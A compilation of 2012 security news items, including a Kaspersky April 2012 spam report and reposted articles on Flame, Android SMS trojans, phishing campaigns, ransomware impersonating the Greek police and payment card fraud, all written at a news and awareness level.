Spam Report: April 2012

April in figures

• The percentage of spam in email traffic was up 2.2 percentage points from March and averaged 77.2%.
• The percentage of phishing emails remained unchanged from March and amounted to 0.01%.
• In April, malicious files were found in 2.8% of all emails — the same amount as in the previous month.
• Over 20% of phishing attacks in April targeted Facebook users.

Spam in the spotlight

New tricks spotted in fraudulent and malicious spam

Spammers who spread malicious code and phishing emails are still looking for the best shortcut to reach computer users. Malicious spam is developing quickly, and malicious users are systemically adding to their arsenal of tricks, both with technical innovations and with new tactics involving social engineering.
Wikipedia and Amazon — bad experience?

In April, we detected spam that at first glance looked just like your typical malicious mass mailing designed to look like an official Facebook notification. The email, allegedly from the social network, announced a new Friend Request on Facebook. Like most of the emails made to look like Facebook notifications over the past year, this mailing was well done and looked like the real thing, at first glance. According to the plans of the malicious users, if the user clicked on any of the links in the email, he would be taken to a website infected with malicious code, rather than Facebook. Sounds familiar, doesn’t it? There is just one difference here — the links in the emails didn’t take users to hacked domains or to sites registered in the .in or co.cc domains, but to pages on Wikipedia and Amazon.


Apparently, malicious users seeded malicious script on their newly created Wikipedia pages as well as on pages made to look like advertisements for pre-owned goods on Amazon.com. Why “apparently”? Because this tactic was not the most effective, as the teams on both services responded promptly, and by the time the links were spread, the pages were already disabled.


Diablo III – pre-release phishing

In early June, the long-awaited game Diablo III is expected to hit the shelves. IT security professionals have some concerns associated with this particular game, and Blizzard has officially permitted the trade of in-game items in this new MMORPG. It is reasonable to expect that phishers will quickly set their sights on Diablo III players. But no one expected malicious users to start using this game even before it was released.
Phishing emails appeared in spam traffic playing off of the impatience of gamers anxiously awaiting Diablo III’s release. The emails stated that they would be given the opportunity to play a beta version of Diablo III for a specific period of time. In order to do so, they would need to enter their battle.net account information (a resource where Blizzard account information is stored). Of course, the link in the email did not lead to the specified site, but to a phishing webpage. Each email was slightly different, but the basic features were ultimately the same.


After obtaining the registration data from a battle.net user, malicious users would then have access to that user’s accounts for popular games like World of Warcraft and Starcraft, which are still in high demand on the black market.
Political spam

Political spam got back in action in April, primarily targeting US and French readers. Mentions of Barack Obama in spam emails were as frequent as they were during the first year after his election. Furthermore, his name is used not only in political emails “exposing his political course” or pointing to the allegation that the President of the US “is afraid of losing the upcoming election,” but also in emails advertising a variety of traditional spammer products. For example, his name is mentioned in one mass spam mailing offering Viagra.


With the upcoming elections in the US, Internet user interest in the battle for the presidency and the personalities of the candidates and the current president will only grow. Spammers will doubtless fan the flames of this interest by spreading propaganda, in addition to continuing to take advantage of this interest for their own purposes. In the months to come, we expect an increase in the number of emails with links allegedly leading to web pages with scandalous information about the candidates and the elections in general. Furthermore, the links will likely take users to advertisements for libido-boosting medications in the best case scenario (as in the example above), or to a malicious program in the worst case scenario.
French political spam is also more active these days, although we did expect a larger volume of political spam mailings in France during the frenzy of the recent presidential race there. The spam emails that we detected were few in number. They included advertisements for T-shirts with pro-Sarkozy slogans.


Other hot topics

The complex situation in Syria has also become the subject of spam emails. “Nigerian” spammers are actively mailing out messages from “lawyers and bank clerks working in the country.” At month’s end, we had also detected emails from “Assad’s wife.” We regularly encounter emails from the “family members of leaders” of a variety of countries facing unstable conditions. Sometimes Nigerian spam emails are even presented as having been written by these very leaders. So it is altogether possible that in the future we will see emails allegedly written by Bashar al-Assad himself. The Assads’ children are still quite young, so we are unlikely to see any of these emails allegedly written by them, although you never know. After all, nothing is sacred to spammers, and a crisis in any country is nothing more than an opportunity to rake in some cash.
We are also seeing a surge in the amount of spam exploiting the European football championship. This event is due to start in June, and Internet users are increasingly interested from day to day. Many spam mailings offer rooms to football fans that haven’t yet made hotel reservations in Poland and Ukraine. However, the accommodation offered by the spammers is bare-bones at best, while the prices have been greatly inflated.
The Summer Olympics in London are currently the focus of attention among “lottery” scammers. Just about every week we see emails announcing lottery winnings, allegedly from a lottery held by the Olympics Foundation.


Statistical summary

Sources of spam



Sources of spam in April 2012 (TOP 20)

In April, the Top 20 sources of spam underwent some major changes from prior months.
The most noticeable change over the month was the US jumping from 20th to 2nd place in the rankings. The proportion of spam originating in the US surged by over 7 percentage points. The amount of spam coming from China also increased – by 5 percentage points – and that country is now ranked 5^th among the world’s top sources of spam. Meanwhile, the percentage of unwanted correspondence originating in Indonesia fell by 5.2 percentage points. This Asian country fell 10 places and ended up in 12^th place last month.
We presume that this change in the spam landscape correlates with the redistribution of powerful spammer-run botnets and their relocation from regions where spam operations have been low-level over the past year. Note that both the US and China (and Hong Kong in particular) were some of the top targets in the first quarter of 2012 for spammers spreading malicious mailings. The infection of new computers in these countries has clearly led to the growth of new botnets.
The other changes in the ratings among sources of spam were limited to no more than 2.5 percentage points.
Malware in mail traffic

In April, malware was found in 2.8% of all emails, which more or less matches the levels detected in March’s mail traffic.
The distribution of email antivirus detections by country


The distribution of email antivirus detections by country, April 2012
Just as it was in the first quarter of 2012, the US has taken the leading position in terms of the number of email antivirus detections. The percentage of Kaspersky Mail Antivirus detections in the US rose only slightly, by just 0.64 percentage points.
Australia (-3.9 percentage points) and Hong Kong (-2 percentage points), countries that had been ranked second and third, respectively, in March, conceded their places to Vietnam in April, which climbed up from 4^th to 2^nd place. The proportion of mail antivirus detections in Vietnam increased by 2.4 percentage points.
The percentages of detections in other countries fluctuated within a range of 2 percentage points.
Top 10 malicious programs spread by email


Top 10 malicious programs spread via email in April 2012
Some 13.7% of all Kaspersky Mail Antivirus detections are for the traditional leader in our Top 10: Trojan-Spy.HTML.Fraud.gen. Detections of this Trojan were 1.6 percentage points higher in April than in March. This malicious program is designed to look like an HTML page serving as a registration form for a financial organization or an online service. The registration data entered on the page are then sent to malicious users.
The usual suspects in our Top 10 — the email worms Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Mydoom.m and Email-Worm.Win32.NetSky.q — are in third, fifth, and ninth place in this month’s ranking respectively. Readers may recall that the functions of the Mydoom and Netsky families of worms are limited to the harvesting of email addresses from infected computers, and sending themselves to these addresses. Bagle.gt is the only worm in the Top 10 that is also capable of sending requests to online resources and then downloading malicious programs.
We should draw attention to the appearance of the script Trojan — Trojan-Downloader.JS.Iframe.cvq — in April’s Top 10. It accounted for nearly 2% of all mail antivirus detections. Another 10% or so of all mail antivirus detections in April were represented by script-based malicious programs that were detected using proactive methods. This is relatively worrisome, as script-based threats in HTML emails launch destructive actions as soon as a recipient opens the email.
Phishing

The percentage of phishing emails remained unchanged from March and amounted to 0.01%.


The distribution of the Top 100 organizations targeted by phishers, by category — April 2012

This rating is based on our anti-phishing component detections activated every time a user attempts to click on a phishing link, regardless of whether the link is in a spam email or on a web page.
In April, we saw a major change in the top phisher-targeted organizations: for the first time in four months, financial organizations (23.61%) left first place, and were replaced by social networking sites (28.8%). The percentage of social networking sites targeted in phishing attacks increased by almost 6 percentage points. The main contributing factor to that rise was due to the numerous attacks on Facebook: over 20% of all phishing attacks in April targeted Facebook users.
Compared to March, the percentage of attacks against financial organizations fell somewhat, as did the percentage of attacks against online stores and search engines, IT vendors and organizations in the “other” category. All of these changes were within a range of 1.5 percentage points.
As a result, one can see a slight change in the focus of phishing attacks increasingly toward the users of social networks.
Spam by category


Spam by category in April 2012

The percentage of the traditional leaders in the top spam categories — Computer Fraud and Personal Finances — changed only slightly in April. The former fell by 2.2 percentage points, and the latter rose by 0.8 percentage points.
The share of advertisements for online casinos remains high at just over 6%.
Most spam emails advertising online casinos clearly show signs of fraud, malicious code, or something else. The Personal Finances category is more often than not made up of dubious offers for cheap loans or fast cash, and there is usually something fishy about them.
Having reviewed these data, one can confidently say that more than half of all spam in April aimed to steal financial or personal information from computer users, as well as indirectly steal their money and install malicious code on their computers.
Incidentally, the most substantial change that we noted from March to April was a rise of 4.75 percentage points in the Interior Design spam category. In April, Kaspersky Lab noted several mass mailings in this category. Apparently, this surge in interior design-themed spam is connected to the “spring cleaning” advertising campaigns pushed by many furniture and renovation companies.
The percentages of other spam categories fluctuated only slightly in April, within a range of 1.5 percentage points.
Conclusion

It needs to be said that spam is posing more of a threat than ever: there is a high percentage of malicious code in attachments, and Kaspersky Lab is detecting a considerable number of spam emails containing malicious links. Furthermore, IT security professionals are seeing even more spam containing script-based threats, which means that even just opening an email could put users at risk. The fact that these mailings continue to spread from month to month demonstrates that Internet users are not sufficiently informed; spam would not be such an attractive means of proliferating malicious code if it were not so lucrative for cybercriminals. Internet users often do not even suspect that their computer’s performance faces any threat at all, not to mention their personal data or cash, when they open a spam email.
In the months to come, we expect a return of the all-too-familiar spam mailings with scandalous news items about current US President Barack Obama. Furthermore, phishing attacks will likely focus more on social networking sites, and possibly online games — as summer vacation is upon us, students on break from school will be more active online. While these users tend not to have bank accounts, they do spend a lot of time on social networks and other online entertainment.

securelist.com

'Flame' cyberespionage worm discovered on thousands of machines across Middle East

The UN's International Telecommunications Union and Kaspersky Labs revealed today that it has discovered Flame, a new trojan rivaling Stuxnet. Codenamed "Worm.Win32.Flame," the malware is currently being researched and it is described as "one of the most complex threats ever discovered." It is believed to be active across thousands of computers in the Middle East, primarily in Iran and Israel, as well as on some machines in North Africa.
Researchers believe that the trojan's primary function is cyberespionage: once Flame infects a computer, it is equipped to record audio from connected or built-in microphones, monitor nearby Bluetooth devices, take screenshots, and save data from documents and emails. All of this data, apparently stolen as part of a targeted attack, is constantly sent up to command and control servers.
Flame "has no major similarities with Stuxnet" or its malware family member Duqu, and is believed to be created and controlled by a separate group. The newly-discovered worm does share some aspects with Stuxnet and Duqu, however. Most disappointingly, Flame takes advantage of the same printer spooling hole and autorun.inf infection methods exploited by Stuxnet. According to Kaspersky Lab's reports, it's believed that Flame achieves its initial infection from users who are victims of phishing attacks, and then once it has made it onto a computer it can be spread over local area networks or via USB flash drives with other machines.
The bad news is that it's confirmed that the worm has spread over local area networks to fully-patched Windows 7 systems, but the good news is that you shouldn't have to worry about Flame breaking into your PC in its current form. As a cyberespionage tool, the trojan has been seen targeting some individuals, but also education and government organizations mainly in the Middle East. Additionally, the research says that the worm surveys a system and will then uninstall itself from machines it thinks are not interesting.
Why is Flame considered to be such a complex threat, then? Well, the malware itself can be up to as large as 20MB — about twenty times larger than Stuxnet. This size is part of what makes Flame unique. According to Kaspersky, most malware is as simple and small as possible, as that makes it easiest to hide the malicious code and get it onto unsuspecting machines. In this case, however, Flame's size made it hard to detect since no one was looking for it. Part of the reason why Flame is so large is because it has optional plug-ins that can be added after a machine is infected to try and get specific data. Different machines have different assortments of plug-ins on them; that 20MB maximum size includes all 20 different plug-ins that have been discovered. Unfortunately, that massive size is going to make it difficult for researchers to get their hands around Flame: Kaspersky says that since it took "several months" to understand Stuxet's 500KB of code, it's expected that Flame may require a year's worth of effort.

theverge.com

Visit ProDefence Community Forum !

Visit ProDefence Community Forum !

http://www.prodefence.org/

How zombie LulzSec exposed privates' love lives with PHP hack

A dating website for US soldiers was hacked and its database leaked after it blindly trusted user-submitted files, according to an analysis by security firm Imperva. The report highlights the danger of handling documents uploaded to web apps.
"LulzSec Reborn" hacktivists attacked MilitarySingles.com and disclosed sensitive information on more than 170,000 lonely-heart privates in March this year. Hackers uploaded a PHP file that posed as a harmless text document and then commandeered the web server to cough up the contents of its user and a hashed password database.

Rob Rachwald, director of security strategy at Imperva, said the attack would have been blocked if MilitarySingles.com had filtered user-supplied content.

He added that a similar Remote File Inclusion-style vulnerabilities will exist in other sites that use PHP and actively solicit photos, video and so on.
Imperva reckons more than 90 per cent of the MilitarySingles.com passwords were cracked in nine hours thanks to extended dictionary-based rainbow lookup tables. MilitarySingles.com stored passwords as non-reversible hashes, rather than in plain text, however it did not salt the hashes, which would have made the process of recovering the passwords far more difficult. Insisting on hard-to-guess passwords isn't good enough unless developers pay attention to encryption best practices, said Rachwald.
The attack against MilitarySingles.com is the only notable assault by LulzSec Reborn. Imperva's analysis suggests the group has no more than six members, who set out to "embarrass the military". The crew is apparently "not as motivated" as the original LulzSec, according to Rachwald, adding that it has made little or no contribution to IRC chats and hacker forums.

MilitarySingles.com, which bills itself as the "dating website for single soldiers... and those interested in meeting them", is run by eSingles Inc.
Government and military personnel ought to have special policies regarding social networking to prevent their information from being easily accessed and manipulated. Rachwald told El Reg that an outright ban is likely to be flouted. Instead soldiers should be encouraged to use pseudonyms and particularly warned against disclosing their location, he said.

theregister.co.uk

Fake Angry Birds app makers fined £50k for shock cash suck

A firm that disguised Android malware as Angry Birds games has been fined £50,000 ($78,300) by UK premium-rate service regulator PhonepayPlus.
A1 Agregator posted mobile apps posing as smash-hit games, including Cut the Rope, on Android marketplaces and other outlets. Rather than offer free entertainment, the software silently sent out a text in order to receive a string of premium-rate messages, costing victims £5 per SMS. Users would have to uninstall the counterfeit apps from their phone to prevent further messages and charges.

The malicious code also covered up evidence of the message swapping which might have alerted punters to the whopping charges on their upcoming bills.

A total of 34 people, perhaps only a small percentage of those affected, complained to PhonepayPlus by the end of last year. In a ruling this month, the watchdog found A1 Agregator guilty of multiple breaches of its code of conduct and levied a fine of £50,000, estimated as the upper limit of the illicit profits made through the scam. A1 Agregator, which wasn't even registered with PhonepayPlus at the time of its offence, must refund defrauded victims in full within three months, whether they've complained or not.
It is understood the firm trousered £27,850 ($43,600) from the scam.

A1 Agregator - which was "formally reprimanded" over its behaviour - must also submit any other premium-rate services it develops to PhonepayPlus for approval over the next 12 months.
Premium-rate SMS scams account for 36.4 per cent of malware on smartphones, the second largest type after spyware, according to analysts Juniper Research.
And Carl Leonard, senior security research manager of EMEA at Websense, added: "Mobile apps are a powerful malware delivery technique as most users are willing to allow apps to do anything to get the desired functionality. Cyber criminals are beginning to use these malicious apps not only to make a quick buck but to also steal valuable data."
"For example, a malicious app could access the data on your phone, or access all of your contacts. This is particularly bad news for businesses that allow bring your own device (BYOD) schemes but don’t have the right security to protect their mobile data," he added.

Android virus evolution

Mobile malware scams first emerged in Russia and China several years ago. Fraudsters are beginning to turn to the West for victims, Kaspersky Lab warns.
"The mobile threat landscape is dominated by malware designed to run on Android – 65 per cent of all threats are aimed at this platform," said David Emm, senior security researcher at Kaspersky. "The platform is popular, it’s easy to write apps for it and it’s easy to distribute them via Google Play – so it’s little wonder that cybercriminals are making use of Google Play, where malware masquerades as a legitimate app."
"SMS Trojans, of the sort mentioned in the [PhonepayPlus] report, are currently the biggest category of mobile malware. And it’s important to understand that it’s not just a problem in Russia or China. Cybercriminals seek to make money from them across the globe, including here in the UK," he concluded.
In the past mobile malware often offered a free application as bait. During installation, the Trojan would display some kind of decoy error message. This prompted victims to search for answers on web forums and elsewhere - which was the last thing scammers want because it could lead marks to the realisation that they'd been suckered.
More recently cybercrooks have begun offering a bait that actually works. A blog post by F-Secure, published with a helpful video, describes an unrelated case of a Trojan installing a working copy of Rovio's Angry Birds Space as it compromises the phone.

theregister.co.uk

Hackers Reveal the Price of iOS Jailbreaks at HITB 2012 Amsterdam

There have been a lot of interesting developments here at Hack in the Box in Amsterdam, and one of them is the first ever union of the jailbreak Dream Team. Today, Softpedia has had the chance to interview the members of the Chronic Dev Team and learn some things that many were probably curious about.

One of the topics we discussed referred to the financial value of jailbreaks. So how much is their work and the information they possess worth?

“This is hard to answer. I think it depends on who you sell your exploits to, if it’s for the underground or the legal scene,” Pod2g said.

“This is a difficult question to answer, but it's a lot. Every jailbreak exploit represents like, maybe, $100,000. This is the price of all root exploits.”

We then asked him to comment on a recent statement in which he said he wouldn’t sell the beta version even for $1 million (760,000 EUR).

“I wrote that, but it's not all about the money. We're doing this for the fame of course. We're doing it for the people, because we want people to be able to have their devices jailbroken,” he explained.


“This is what we're doing. This is what we like, so this is not about money. That's why even if we could get anything from these jailbreaks, if the only thing we could get is to make people happy, that is enough for us.”

It’s interesting to see a price estimate for the jailbreaks, but as the hackers highlighted, it’s not all about the money. There probably isn’t a researcher in the world who would refuse money if someone wanted to reward him, but these guys really gave us the impression, during our talk, that they’re really in it for the challenge and the users, not for their personal gain.

softpedia.com

Hacker Behind “Call of Duty” Trojan Sent to Prison for 1.5 Years

Many gamers may have noticed the Trojan-infected file that’s being advertised as a patch for the popular Call of Duty game. As it turns out, the mastermind behind this scheme is a 20-year-old student from the UK who has used the malware to collect credit card details from the affected computers.

Kent Online reports that Lewis Martin was apprehended by police while trying to steal computer equipment from colleges in Dover and Deal.

When investigators searched his house, they uncovered documents containing 300 credit card credentials, along with passwords. The details of a fraudulent bank loan were also found.

Prosecutors accused him of using the Trojan to collect credit card details, passwords and credentials to websites such as PayPal, which he sold on the underground markets for sums between $1 (.76 EUR) and $5 (4 EUR).

Now, he has been sentenced to serve 18 months in prison for fraud and burglary charges.


Apparently, Martin was known by law enforcement representatives as a burglar, since he was caught on numerous occasions breaking into educational institutions. However, we’re more interested in the part in which he used the piece of malware to commit his crimes.

This incident shows that users subject their digital assets to numerous risks when downloading games from untrusted sources.

We’ve recently seen how most “Diablo 3 free download” searches point to malware-laden websites. With patches and key generators the problem is even more serious because most of the malicious files actually work, making users disregard the warnings displayed by their antivirus software.

What they don’t know is that while they’re happy to be playing the game, a nasty Trojan is logging their every move, stealing every bit of valuable information it finds.

“Game players would be wise to pay attention to the technique used by Lewys Martin to infect computers,” Graham Cluley, senior technology consultant at Sophos, advises.

“It's not uncommon for malware to be distributed in the form of cracks and hacks for popular computer games - if you run unknown code on your computer to meddle with a video game, you might well be allowing malware to insidiously install itself too.”

softpedia.com

Social Engineering and Hacking Skills Put to the Test at HITB 2012 Amsterdam

As we’ve mentioned on previous occasions, this year’s Hack in the Box (HITB) security conference in Amsterdam will feature a lot of great speakers and challenges. One of these will be the “Social Engineering and CTF Challenge” created and run by Sogeti Nederland B.V.

“With #SSEC2012, Sogeti Nederland is very excited to bring a social engineering element into this year’s HITBSecConf. The human factor is often referred to as the weak link in infosecurity defenses,” revealed Martin Visser, a senior security specialist.

“This challenge is aimed to not only highlight the human risk factor, but to also demonstrate the ease with which it can be compromised. Knowing what are the common pretext strategies used to fraud employees is key in protecting organisations from social engineering attacks.”

The competitor’s skills will certainly be put to the test in the contest whose purpose is to raise awareness on attacks that target the weakest link in cybersecurity, the human factor.


Over the course of two days participants will have to hack into wireless routers, social engineer the employees of high-profile Dutch companies and solve a challenge in Sogeti’s CTF web app.

For the social engineering part, contestants will have to trick company employees into performing certain tasks or handing out certain pieces of information. Of course, they will not have to obtain passwords or other sensitive data, but less significant details such as the name of the company’s catering company.

“The human element remains a major potential security vulnerability in any organisation. Verizon’s 2011 Data Breach Investigations report showed that 11% of breaches are from social engineering attacks and of these, 44% are from pretexting”, said Dhillon Andrew Kannabhiran, the founder and CEO of HITB.

Users from all around the world can join in on the action since it will be broadcasted via webcam feed and audio stream.

softpedia.com

Flashback Operators Fail to Cash Out Their “Winnings”

Some time ago Symantec revealed that the masterminds behind the now-infamous OSX Flashback Trojan made bundles of money. Further analysis, however, has shown that they may have failed to collect as a result of their operations.

Previously, we had learned that the fraudsters made money by displaying ads on compromised computers. The figures show that they’ve displayed 10 million advertisements on the devices of the affected individuals over the course of three weeks.

Of those 10 million, 400,000 were actually clicked on, which normally meant that they would have received $14,000 (10,640 EUR) from the pay-per-click (PPC) providers.

However, according to Symantec, the PPC firms don’t just hand over money to anyone without performing a few checks, this being a perfect example of a situation in which the scammers failed to bypass the anti-fraud measures.

Firms that offer PPC services are more than happy to pay up if users actually see their ads, but in click fraud cases such as this one, the victims may not see the ads, and they’re certainly not interested in the content that's being displayed because in most cases it’s irrelevant.

Furthermore, the cybercrooks may have analyzed each PPC provider to see which one suits their needs, since 98% of the adverts originate from the same organization.


While it’s estimated that a total of 600,000 machines have been infected with Flashback, in reality only 2% (around 10,000) of them were compromised to serve the final payload, the one that actually earned money.

As the researchers highlighted, the campaign was a success, but it could have been even more so, a situation in which the fraudsters could have made millions of dollars in a year.

Fortunately, they failed to collect, which may discourage others from launching such campaigns. On the other hand, the failure may make them more determined to try harder next time.

softpedia.com

Worm Uses Facebook PMs and Instant Messaging Apps to Spread

Social media platforms and popular instant messaging (IM) apps are great mediums for cybercriminals to spread their malicious elements. Trend Micro experts provide a great example of a worm that’s making its way to computers using such methods.

The researchers report that the piece of malware, identified as Worm_Steckct.evl, is distributed via a link that’s sent in private messages on Facebook and IM programs.

The shortened links contained in the posts point to an archive called “May09- Picture18.JPG_ www.facebook.com.zip” which hides a file named “May09-Picture18.JPG _www.facebook.com.” The .com extension reveals that in fact this is an executable file.

Once it’s run, the worm steps into play and terminates all the processes and services created by security software, thus ensuring that antivirus applications cannot disrupt its evildoings.


Steckct.evl then downloads another worm, detected as Worm_Eboom.ac, which monitors the victim’s browsing sessions.

The worrying part is that it doesn’t only log the posts and private messages the customer creates or deletes on Facebook, MySpace, Twitter, WordPress, or Meebo, but it can also spread by utilizing the user’s active session on these sites.

“Facebook and IM applications are tools to share and connect. Cybercriminals’ use of these tools is nothing new, but there are users who fall prey to these schemes. We recommend users to be conscious with their online behavior, in particular on social media sites,” Cris Pantanilla, Threat Response Engineer at Trend Micro writes.

As the expert highlights and as we’ve highlighted numerous times before, internauts must be wary of links that point to shady-looking websites or suspicious files.

In this particular case, it’s clear that the alleged picture taken on “May09” is not a JPG file, but an executable that’s not even so cleverly masked.

softpedia.com

Σχηματισμός δικογραφίας για κακόβουλο λογισμικό σε ηλεκτρονικές σελίδες

ΔΕΛΤΙΟ ΤΥΠΟΥ 

Κακόβουλο λογισμικό εντοπίστηκε στο διαδίκτυο για δήθεν
μπλοκάρισμα ηλεκτρονικών σελίδων και υπολογιστών από την Ελληνική Αστυνομία. 

Εμφανίζεται μήνυμα, το οποίο ενημερώνει το χρήστη πως για την
απεμπλοκή απαιτείται η πληρωμή αντιτίμου των 50 ευρώ μέσω προπληρωμένης κάρτας. 

Πρόκειται για ιστοσελίδες που παρέχουν τη δυνατότητα για παράνομο "κατέβασμα" ταινιών, τραγουδιών και άλλων ψηφιακών αρχείων. 

Κακόβουλο λογισμικό εντοπίστηκε για άλλη μια φορά στο διαδίκτυο, στο οποίο εμφανίζεται μήνυμα για δήθεν μπλοκάρισμα ηλεκτρονικών σελίδων και αντίστοιχα των χρηστών των σελίδων αυτών από την Ελληνική Αστυνομία (ΕΛ.ΑΣ).

Στο συγκεκριμένο μήνυμα αναφέρεται πως για την απεμπλοκή απαιτείται η αποστολή 50 ευρώ μέσω προπληρωμένης κάρτας (Paysafe card), προκειμένου να επανέλθει ο υπολογιστής στην κανονική του λειτουργία.

Όπως προέκυψε από την αστυνομική έρευνα, το κακόβουλο λογισμικό φιλοξενείται σε ιστοσελίδες του διαδικτύου, στις οποίες οι χρήστες έχουν τη δυνατότητα να κατεβάζουν ψηφιακά αρχεία με οπτικοακουστικό υλικό (τραγούδια, ταινίες κ.ά.) και προσβάλει υπολογιστές με λειτουργικό σύστημα Windows.

Συγκεκριμένα, κατά τη διαδικασία «φόρτωσης» της ιστοσελίδας, εμφανίζεται αυτόματα στην οθόνη του υπολογιστή μήνυμα, το οποίο ενημερώνει το χρήστη ότι έχουν εντοπιστεί παράνομα μουσικά αρχεία και για το λόγο αυτό ο υπολογιστής του έχει πλέον μπλοκαριστεί από την Ελληνική Αστυνομία.

Στην περίπτωση που ο χρήστης συμπληρώσει τον αριθμό της προπληρωμένης κάρτας, αυτός αποστέλλεται σε συγκεκριμένη ηλεκτρονική διεύθυνση και αποθηκεύεται σε βάση δεδομένων που έχει δημιουργηθεί, παρέχοντας πλέον πρόσβαση στα συγκεκριμένα στοιχεία από άλλα άτομα.

Από τη Δίωξη Ηλεκτρονικού Εγκλήματος έχει σχηματιστεί δικογραφία, η οποία θα υποβληθεί στην Εισαγγελία Πρωτοδικών Αθηνών.

Καλούνται οι πολίτες που τυχόν έχουν εντοπίσει ή έχει προσβληθεί ο υπολογιστής τους, από το συγκεκριμένο κακόβουλο λογισμικό, να μην εισαγάγουν το ποσό που δήθεν απαιτείται για την απεμπλοκή του και σε κάθε περίπτωση, εφόσον επιθυμούν, μπορούν να υποβάλλουν έγκληση στην Υποδιεύθυνση Δίωξης Ηλεκτρονικού Εγκλήματος (Λ. Αλεξάνδρας 173, Τ.Κ. 11522, Αμπελόκηποι).

Ως λύση προτείνεται η επανεκκίνηση του ηλεκτρονικού υπολογιστή σε ασφαλή λειτουργία (F 8 και επιλογή safe mode κατά την εκκίνηση) και στη συνέχεια να πραγματοποιηθεί επαναφορά του συστήματος σε ημερομηνία προγενέστερη από την ημερομηνία που εμφανίσθηκε το μήνυμα (Εργαλεία Συστήματος Επαναφορά συστήματος).

Σημειώνεται ότι οι πολίτες πριν εκτελέσουν την επαναφορά λειτουργίας του συστήματος πρέπει να ενημερωθούν μέσω της ακόλουθης ιστοσελίδας http://windows.microsoft.com/el-gr/windows-vista/What-is-System-Restore, για την έννοια της επαναφοράς συστήματος και για το είδος των αρχείων που τροποποιούνται κατά την εφαρμογή της.

Για περισσότερες πληροφορίες σχετικά με την προσβολή από το κακόβουλο λογισμικό, απευθυνθείτε στη Δίωξη Ηλεκτρονικού Εγκλήματος, στα εξής στοιχεία επικοινωνίας:

• Τηλεφωνικούς αριθμούς: 210-6476464 και 210-6476461
• E - mail: ccu@cybercrimeunit.gov.gr & 11012@hellenicpolice.gr.  
    

Avast Warns About “FakeInst” and Alternative Android Markets

The large number of malicious websites designed to infect Android devices with the well-known Android:FakeInst SMS Trojan have made Avast security experts issue another warning to alert users of its presence. They also advise smartphone owners to beware of shady-looking alternative Android app markets.

Researchers have found several domains, such as t2file.net and uote.net, which store at least 25 new apps that mask the piece of malware.

After users are lured onto these websites, they’re presented with a phony Downloader program. The truly evil thing about this app is that it tells the victim that the operation may cost money, but the Quit button doesn’t work.

Once the installation process begins, there’s nothing you can do, but click on the Agree or OK buttons. Of course, there are methods to stop the task, but to the untrained user it appears as he/she has no other choice.


What is even more worrying is the fact that once one of these buttons is pressed, an SMS to a premium rate number is already sent out. To make matters worse, the Trojan contains premium numbers for around 60 different countries worldwide, which means that if the victim isn’t located in Antarctica, he/she will most likely end up with an inflated phone bill.

In order to prevent experts from analyzing the malware, its creators have used AES encryption to make the file inaccessible.

Each SMS sent out by Android:FakeInst costs around $4 (3 EUR), which means that the cybercriminals behind this operation can earn considerable amounts of money from users who make the mistake of downloading software from alternative markets.

“Never trust weird looking alternative markets and always check the app permissions. If you’ve downloaded a game that asks for SMS and Phone calls permissions, it probably means that someone is about to “play you” instead,” Avast’s Alena Varkočková explained.

softpedia.com

Fake Android Antivirus Served via Twitter Spam

Security researchers warn that Twitter is being flooded with shady looking posts that contain links to websites hosted on .tk domains. These websites hide malicious elements that target not only PC users, but also Android owners.

GFI Labs experts report that while PC users are served broken .jar files, Android customers are tricked into installing a fake antivirus application whose icon replicates the one of products provided by Kaspersky.

So let’s take a look at how these schemes work.

First, the cybercriminals post tweets in Russian or English that advertise all sorts of materials, mainly adult content. All the tweets contain a link to a site such as “good-graft.tk.”


Once clicked, the links open a Russian site that’s designed for both smartphone and computer owners. Depending on the device from which the website is accessed, the potential victim is served a file called VirusScanner.jar (for PC), or VirusScanner.apk (for Android).

As mentioned before, experts revealed that the .jar file seems to be broken, since an error is displayed when it is executed. However, this may change at any time, so internauts should be wary when presented with such an element.


VirusScanner.apk is a rogue antivirus application which displays the Kaspersky logo when it is installed.

Identified as Trojan.Android.Generic.a by GFI’s VIPRE Mobile Security, the piece of malware reveals its true purpose during the installation process when it asks permission to access phone calls, messages and even services that cost money.

We strongly advise you to refrain from clicking on links contained in Twitter posts if they look suspicious. Furthermore, site addresses that end in .tk are usually a good indicator of a malicious plot.

On the other hand, even if you do end up on a shady site, at least make sure you don’t install anything that’s pushed to your device.

Finally, although many argue that mobile threats are not yet so popular, users should learn to treat their smartphones just as they do their computers and install antivirus solutions from legitimate and reputable companies.

softpedia.com 

Phishers to Hotmail Users: Your Account Has Been Blocked

Hotmail customers are advised to be on the lookout for emails entitled “E-mail account alert!” which notify them that their accounts have been blocked. These messages hide a link which points to a malicious website that urges the potential victim to provide his login credentials.

Here’s part of the shady notification, provided by the folks from Hoax Slayer:

This e-mail has been sent to you by Hotmail to inform you that your account has been blocked.

Why are you seeing this? Someone may have used your account to send out a lot of junk messages (or something else that violates the Windows Live Terms of Service). We're here to help you get your account back. What do you need to do?

We'll ask you to login to our secured activation page by following the link below and re-activate your account.
[Link]

If you have already confirmed your account information then please disregard this message.


Users who fall for the scam and click on the shady link are taken to a website that almost perfectly replicates the genuine Windows Live login webpage. Once the username and password are provided, the unsuspecting victim is taken to the legitimate website.

This might make him/her believe that the login simply failed. When they do sign on to their account, they may think that the re-activation process was successful.

While it is true that cybercriminals use compromised accounts to send out spam and other malicious notifications, internauts shouldn’t rush to trust every email they receive.

On the contrary! With all the malevolent plots making the rounds online, users should see every alert as a potential threat.

There are a few simple steps that can be taken to verify a notification’s legitimacy. First, look at the sender’s email address. Even though many of them are spoofed to look like they originate from a legitimate address, in some cases you will see that the sender is something like hotmail-notifications@yahoo.com.

The name of the site that hides behind the link is also very important. If the hyperlink points to any other URL than the company’s official one, it’s most likely a scam.

softpedia.com

Card Information Stolen in Global Payments Incident Used for Fraud

Union Savings Bank (USB) representatives noticed that some of the debit cards issued by the financial institution were used to commit fraud that leveraged prepaid cards. They determined that the account information utilized by the fraudsters was stolen as a result of the Global Payments incident.

According to security journalist Brian Krebs, USB notified Visa after realizing that the private school's cafe where most of the cards were used was actually a Global Payments customer.

Shortly after, the bank was contacted by Tony Higgins, a fraud investigator who worked for Safeway Inc, a grocery store chain in Nevada and Southern California.

The institution learned from Higgins that the crooks purchased Safeway prepaid cards from the stores. On the magnetic stripes of these cards they encrypted account information from USB.


To make their trail hard to follow, they used them to purchase other prepaid cards with which they bought electronics and expensive products.

The investigator told Doug Fuller, USB’s chief risk officer, that the fraudsters were committing their crimes mostly in Las Vegas, but also in nearby states. He believed that they were actually from Los Angeles and San Diego, but came to Vegas to make use of the payment cards.

